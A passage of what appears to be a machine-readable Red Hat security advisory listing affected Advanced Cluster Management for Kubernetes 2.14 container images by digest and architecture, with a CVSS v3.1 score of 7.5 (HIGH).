"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
